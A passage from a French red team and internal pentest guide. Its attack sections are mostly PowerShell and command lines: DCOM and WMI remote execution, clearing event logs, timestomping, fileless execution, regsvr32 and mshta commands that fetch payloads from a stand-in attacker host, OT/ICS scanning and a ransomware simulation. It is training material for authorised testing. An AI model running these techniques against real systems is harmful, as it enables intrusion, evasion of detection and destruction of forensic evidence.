Au-delà des techniques de mouvement latéral classiques (PSExec, WMI CreateProcess), des méthodes moins documentées exploitent des interfaces COM spécifiques offrant une détectabilité significativement réduite. Ces techniques avancées, utilisées par des groupes APT pour traverser des segments réseau protégés, constituent le niveau supérieur de la boîte à outils du Red Teamer en 2026.

# DCOM via ShellBrowserWindow (moins détecté que MMC20)
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.1.20"))
$item = $com.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\Temp\out.txt","C:\Windows\System32",$null,0)

# DCOM via ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","192.168.1.20"))
$item = $com.Item()
$item.Document.Application.ShellExecute("powershell.exe","-enc BASE64CMD",$null,$null,0)

# WMI Provider Host abuse (moins commun)
# Exécution via Win32_ScheduledJob (AT jobs legacy, toujours fonctionnel)
$wmi = [wmiclass]"\\192.168.1.20\root\cimv2:Win32_ScheduledJob"
$job = $wmi.Create("cmd.exe /c whoami >> C:\Temp\out.txt", "********10:00:00.000000+060")
# Supprimer la tâche après exécution
([wmi]"\\192.168.1.20\root\cimv2:Win32_ScheduledJob.JobId=$($job.JobId)").Delete()
À retenir : DCOM ShellBrowserWindow et ShellWindows sont des méthodes d'exécution distante authentifiées qui ne créent aucun nouveau processus enfant directement observable — l'exécution se fait dans le contexte du processus explorer.exe existant. Leur détection nécessite une surveillance comportementale avancée du trafic réseau RPC et des actions d'explorer.exe.

65. Gestion des sessions et reprise après détection

Un scénario réaliste en Red Team est la détection partielle — le SOC identifie un beacon ou une activité suspecte, isole le poste compromis, et commence une investigation. La gestion de cette situation par le Red Team est une compétence souvent négligée dans les formations. En 2026, les bonnes pratiques incluent la redondance des accès, la capacité de pivot rapide, et la stratégie de "stay low" pour maintenir la mission malgré une détection partielle.

# Stratégie de redondance : maintenir plusieurs points d'accès simultanément
# 1. Beacon principal (domaine fronting HTTPS)
# 2. Beacon de backup (DNS, check-in toutes les 6h)
# 3. Accès SSH clé publique sur un serveur Linux compromis
# 4. WMI subscription de persistance sur une machine secondaire

# En cas de détection du beacon principal :
# - Basculer immédiatement sur le beacon DNS (long jitter, peu de trafic)
# - Eviter toute activité pendant 24-48h (période d'investigation SOC)
# - Reprendre via un nouveau vecteur d'entrée si possible

# Changement d'identité sur le réseau
# Utiliser un compte différent depuis une machine différente
nxc smb NEW_TARGET -u different_user -p different_password

# Nettoyage des traces en cas d'abandon d'un poste compromis
# Suppression des artefacts courants
Remove-Item -Path "C:\Temp\*" -Force
Remove-Item -Path "C:\Windows\Temp\*" -Force
Clear-EventLog -LogName "Windows PowerShell"
Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"
# Note : le nettoyage des logs est lui-même détectable et suspect

66. Protocoles industriels et OT/ICS dans le périmètre interne

Les réseaux d'entreprise modernes incluent de plus en plus des composants OT (Operational Technology) — automates programmables industriels (PLC), systèmes SCADA, IHM (Interfaces Homme-Machine), capteurs IoT industriels. Ces équipements, conçus pour la disponibilité et non pour la sécurité, présentent des vulnérabilités béantes lorsqu'ils sont exposés, même partiellement, au réseau IT. En pentest interne, leur découverte et documentation est attendue sans que leur exploitation soit systématiquement autorisée dans les RoE — un crash d'automate peut avoir des conséquences physiques réelles.

# Découverte des équipements OT/ICS sur le réseau
# Protocoles industriels courants
nmap -p 102,502,4840,44818,47808,2404 192.168.1.0/24 --open

# Port 102 : Siemens S7 (ISO-TSAP)
# Port 502 : Modbus TCP
# Port 4840 : OPC UA
# Port 44818 : EtherNet/IP (Allen-Bradley)
# Port 47808 : BACnet (bâtiments)
# Port 2404 : IEC 60870-5-104 (énergie)

# PLCscan : scan Modbus et S7
plcscan --target 192.168.1.0/24

# Nmap scripts ICS
nmap -p 502 --script modbus-discover 192.168.1.100
nmap -p 102 --script s7-info 192.168.1.100

# IMPORTANT : ne jamais envoyer de commandes d'écriture sur des équipements OT
# La simple lecture peut provoquer des perturbations sur certains équipements
# Toujours obtenir une autorisation explicite et un contact d'urgence opérationnel
À retenir : La convergence IT/OT est identifiée par l'ANSSI comme l'un des risques majeurs pour les infrastructures critiques françaises. Le groupe APT Sandworm (GRU) a démontré avec Industroyer/Crashoverride et NotPetya la capacité à traverser les frontières IT/OT pour impacter des systèmes physiques. Documentez systématiquement tous les équipements OT découverts en pentest interne, même sans les tester activement.

67. Techniques d'anti-forensics en contexte offensif

Les techniques d'anti-forensics visent à réduire ou éliminer les traces laissées par les activités offensives sur les systèmes compromis. En contexte Red Team, elles permettent de tester la capacité des équipes forensics et du SOC à identifier et reconstituer une attaque a posteriori. La compréhension de ces techniques est également indispensable pour comprendre pourquoi certains groupes APT restent non détectés pendant des mois ou des années.

# Modification des timestamps (Timestomping)
# Rendre un fichier malveillant "aussi vieux" que les fichiers système légitimes
$file = Get-Item "C:\Temp\payload.exe"
$legitimate_file = Get-Item "C:\Windows\System32\notepad.exe"
$file.CreationTime = $legitimate_file.CreationTime
$file.LastWriteTime = $legitimate_file.LastWriteTime
$file.LastAccessTime = $legitimate_file.LastAccessTime

# Nettoyage des logs PowerShell (détectable car Event ID 104)
$EventLog = [System.Diagnostics.EventLog]::new("Windows PowerShell")
$EventLog.Clear()

# Suppression des événements Sysmon (nécessite droits élevés)
# Non recommandé car très détectable et souvent échoue sur EDR modernes

# Exécution en mémoire uniquement (fileless)
# Pas d'artefact sur disque = pas de trace forensics disque
$code = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("BASE64_PS_CODE"))
Invoke-Expression $code

# Utiliser AppLocker bypass pour exécution non tracée
# regsvr32 /s /n /u /i:http://attacker/payload.sct scrobj.dll
# mshta http://attacker/payload.hta

68. Tests de résilience : simulation de scénarios ransomware

En 2026, la simulation de scénarios ransomware est devenue une demande croissante de la part des clients qui souhaitent évaluer leur capacité de détection et de réponse à ce type d'attaque. Cette simulation — appelée Ransomware Readiness Assessment — ne chiffre évidemment pas les données réelles, mais reproduit fidèlement les comportements précurseurs des groupes ransomware modernes : reconnaissance interne, mouvement latéral, compromission des sauvegardes, désactivation des defenses, et simulation de chiffrement sur des fichiers de test.

# Simulation comportements pre-ransomware (sans chiffrement réel)
# Phase 1 : Reconnaissance réseau (comportement LockBit/BlackCat)
nxc smb 192.168.1.0/24 -u compromised_user -p password --shares 2>/dev/null | grep -i "read\|write"

# Phase 2 : Identification des sauvegardes (cible prioritaire des ransomwares)
nxc smb dc01.domain.local -u compromised_user -p password \
  -x "vssadmin list shadows" --no-bruteforce

# Phase 3 : Désactivation défenses (simulation - documenter sans exécuter en prod)
# Les groupes ransomware typiquement :
# - Désactivent Windows Defender via GPO ou registre
# - Désactivent les services de sauvegarde (VSS, Windows Backup)
# - Désactivent les agents EDR via driver vulnérable (BYOVD)
# - Exfiltrent les données avant chiffrement (double extorsion)

# Phase 4 : Test de chiffrement sur fichiers dédiés (répertoire de test isolé)
# Créer des fichiers de test représentatifs
$testDir = "C:\Temp\RansomSimTest"
New-Item -ItemType Directory -Path $testDir
1..100 | ForEach-Object { "Simulated sensitive data $_" | Out-File "$testDir\file_$_.txt" }
# Mesurer le temps de chiffrement (pour estimer la fenêtre de réponse)
Measure-Command {
  Get-ChildItem $testDir -Filter "*.txt" | ForEach-Object {
    Rename-Item $_.FullName ($_.FullName + ".encrypted_test")
  }
}
À retenir : Les groupes ransomware modernes comme LockBit 3.0, BlackCat/ALPHV et Akira passent en moyenne 4 à 6 jours dans le réseau avant de déclencher le chiffrement. Cette phase de "dwell time" correspond exactement aux techniques couvertes dans ce guide : reconnaissance AD, mouvement latéral, compromission des sauvegardes. Un pentest interne qui reproduit cette séquence donne une mesure fidèle de la capacité de détection de l'organisation.

69. Certification et formation Red Team : parcours 2026

Le marché de la formation et certification en sécurité offensive s'est considérablement structuré entre 2022 et 2026. En France, la demande en pentesters internes et Red Teamers qualifiés dépasse largement l'offre, créant un marché favorable aux professionnels certifiés. Voici un parcours de formation recommandé pour atteindre le niveau Red Team senior.

CertificationOrganismePrérequisFocusCoût approx.
eJPTeLearnSecurityDébutantPentest fondamentaux200€
OSCPOffensive SecurityIntermédiairePentest externe + LPE1499$
CRTOZero-Point SecurityOSCP ou équivalentCobalt Strike, Red Team AD399£
CRTEAltered SecurityIntermédiaire ADAD avancé, ADCS, Azure249$
OSEDOffensive SecurityOSCPExploit développement Windows1499$
OSEPOffensive SecurityOSCPÉvasion AV, Active Directory1499$
PNPTTCM SecurityDébutant/IntermédiairePentest pratique réseau399$

En France, la qualification PASSI de l'ANSSI est le standard professionnel reconnu qui atteste de la compétence des prestataires de pentest. Elle n'est pas une certification individuelle mais une accréditation de la société — chaque membre de l'équipe doit cependant justifier d'un niveau d'expérience et de formation documenté.

70. Mise en pratique : scénario complet de pentest interne type

Cette dernière section synthétise l'ensemble du guide à travers un scénario de pentest interne complet, de la première connexion au réseau à la remise du rapport. Ce scénario type illustre la chaîne d'attaque la plus fréquemment rencontrée dans nos missions de 2024-2026 : une organisation avec AD non durci, ADCS déployé mais non audité, et EDR basique.

Jour 1 : Accès initial et reconnaissance

Le client nous fournit un accès VPN avec un compte de domaine standard (utilisateur normal, aucun droit particulier). Première connexion à 9h00 : le laptop d'attaque est configuré avec le nom d'hôte LAPTOP-FINANCE-07 pour passer inaperçu. Les 30 premières minutes sont consacrées à l'observation passive — analyse du trafic broadcast pour identifier les protocoles actifs (LLMNR/NBT-NS très présents), cartographie des segments réseau accessibles.

A 9h30, lancement de Responder en mode analyse (sans poison) pour écouter les requêtes LLMNR — en 20 minutes, 15 noms de machines et 3 hashes NTLMv2 sont capturés sans aucune action active. Deux hashes appartiennent à des utilisateurs du service IT qui ont tenté d'accéder à des partages inexistants. À 10h00, lancement de BloodHound DCOnly pour collecter la structure AD — la collecte prend 8 minutes et révèle 850 utilisateurs, 120 groupes, et 45 computers. La première requête Cypher "Find Shortest Paths to Domain Admin" identifie 3 chemins distincts, dont un via un compte Kerberoastable membre indirect de Domain Admins.

Jour 1 (suite) : Premier accès élevé

À 11h15, Certipy find révèle deux templates ADCS vulnérables ESC1 — le template "UserCertificate" est accessible à tous les utilisateurs authentifiés et permet de spécifier un Subject Alternative Name arbitraire. Exploitation immédiate : demande d'un certificat pour administrator@domain.local. À 11h23, le certificat est émis sans aucune alerte (Web Enrollment HTTP, pas HTTPS, pas de MDI déployé). Authentification Kerberos via PKINIT avec le certificat : le hash NT de l'administrateur est obtenu. Le compte Administrator est opérationnel — le domaine est compromis 2h23 après la première connexion VPN.

Jours 2-5 : Approfondissement et post-exploitation

Les jours suivants sont consacrés à documenter l'étendue complète de la compromission : DCSync pour obtenir tous les hashes du domaine (22 000 comptes), identification des 3 autres domaines connectés par trusts (dont un domaine de partenaire avec trust bidirectionnel), cartographie des accès cloud (5 tenants Azure avec SSO AD), et tests de persistance (AdminSDHolder backdoor, WMI subscription sur 3 serveurs critiques). Chaque action est horodatée et documentée pour le rapport. Les sauvegardes sont localisées (NAS Synology + Veeam sur une VM) et leur accessibilité démontrée sans extraction réelle.

Jour 7-10 : Rapport et restitution

La rédaction du rapport occupe 4 jours complets. L'Executive Summary de 3 pages résume : compromission totale en <3h depuis un accès utilisateur standard, 5 vecteurs critiques identifiés (ADCS ESC1, NTLM relay, Kerberoasting, délégation non contrainte, trust exploitation), recommandations priorisées sur 3 horizons temporels (immédiat <48h, court terme <1 mois, moyen terme <6 mois). La restitution orale de 2 heures avec la DSSI et les équipes techniques permet de répondre aux questions et de valider les recommandations avec le contexte organisationnel.

À retenir : Ce scénario illustre pourquoi le pentest interne est indispensable : aucun scanner automatique n'aurait détecté la combinaison ADCS ESC1 + absence d'HTTPS sur Web Enrollment + compte utilisateur standard. Seul un raisonnement humain sur les chemins d'attaque permet d'enchaîner ces vulnérabilités individuellement faibles en une compromission totale en moins de 3 heures.
Aller au chapitre :

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis